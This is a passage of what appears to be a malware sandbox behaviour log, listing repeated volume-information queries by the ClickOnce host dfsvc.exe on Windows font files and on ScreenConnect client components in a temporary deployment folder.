                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll VolumeInformationJump to behavior
